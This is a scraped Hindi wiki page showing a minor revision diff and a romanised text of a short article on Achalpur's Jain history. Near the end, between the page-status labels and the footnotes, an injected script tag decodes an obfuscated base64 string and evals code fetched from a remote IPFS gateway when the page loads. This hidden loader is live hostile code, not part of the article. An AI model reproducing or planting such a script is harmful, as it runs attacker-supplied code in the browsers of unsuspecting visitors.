Difference between revisions of "अचलपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
Line 2: Line 2:
 
*मध्यकाल में विशेषत: 9वीं शती से 12वीं शती ई0 तक अचलपुर जैन संस्कृति के केन्द्र के रूप में विख्यात था।  
 
*मध्यकाल में विशेषत: 9वीं शती से 12वीं शती ई0 तक अचलपुर जैन संस्कृति के केन्द्र के रूप में विख्यात था।  
 
*जैन विद्वान धनपाल ने अचलपुर में ही अपना ग्रन्थ 'धम्म परिक्खा' समाप्त किया था।  
 
*जैन विद्वान धनपाल ने अचलपुर में ही अपना ग्रन्थ 'धम्म परिक्खा' समाप्त किया था।  
*आचार्य हेमचंद्रसूरि ने भी अपने व्याकरण में <ref>व्याकरण (2, 118)</ref> अचलपुर का उल्लेख किया है- 'अचलपुरेचकारलकारयोर्व्यत्ययो भवति' अर्थात् अचलपुर के निवासियों के उच्चारण में च और ल का व्यत्यय (उलटफेर) हो जाता है।  
+
*आचार्य हेमचंद्रसूरि ने भी अपने व्याकरण में <ref>व्याकरण (2, 118</ref> अचलपुर का उल्लेख किया है- 'अचलपुरेचकारलकारयोर्व्यत्ययो भवति' अर्थात् अचलपुर के निवासियों के उच्चारण में च और ल का व्यत्यय (उलटफेर) हो जाता है।  
 
*आचार्य जयसिंहसूरि ने 9वीं शती ई0 में अपनी धर्मोपदेशमाला में अयलपुर या अचलपुर के अरिकेसरी नामक जैन नरेश का उल्लेख किया है- 'अयलपुरे दिगंबर भत्तो अरिकेसरी राजा'।  
 
*आचार्य जयसिंहसूरि ने 9वीं शती ई0 में अपनी धर्मोपदेशमाला में अयलपुर या अचलपुर के अरिकेसरी नामक जैन नरेश का उल्लेख किया है- 'अयलपुरे दिगंबर भत्तो अरिकेसरी राजा'।  
 
*अचलपुर से 7वीं शती ई. का एक ताभ्रपट्ट भी प्राप्त हुआ है।  
 
*अचलपुर से 7वीं शती ई. का एक ताभ्रपट्ट भी प्राप्त हुआ है।  

Revision as of 12:35, 27 July 2011

  • achalapur barar, maharashtr mean sthit hai.
  • madhyakal mean visheshat: 9vian shati se 12vian shati ee0 tak achalapur jain sanskriti ke kendr ke roop mean vikhyat tha.
  • jain vidvan dhanapal ne achalapur mean hi apana granth 'dhamm parikkha' samapt kiya tha.
  • achary hemachandrasoori ne bhi apane vyakaran mean [1] achalapur ka ullekh kiya hai- 'achalapurechakaralakarayorvyatyayo bhavati' arthath achalapur ke nivasiyoan ke uchcharan mean ch aur l ka vyatyay (ulatapher) ho jata hai.
  • achary jayasianhasoori ne 9vian shati ee0 mean apani dharmopadeshamala mean ayalapur ya achalapur ke arikesari namak jain naresh ka ullekh kiya hai- 'ayalapure diganbar bhatto arikesari raja'.
  • achalapur se 7vian shati ee. ka ek tabhrapatt bhi prapt hua hai.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vyakaran (2, 118

bahari k diyaan

sanbandhit lekh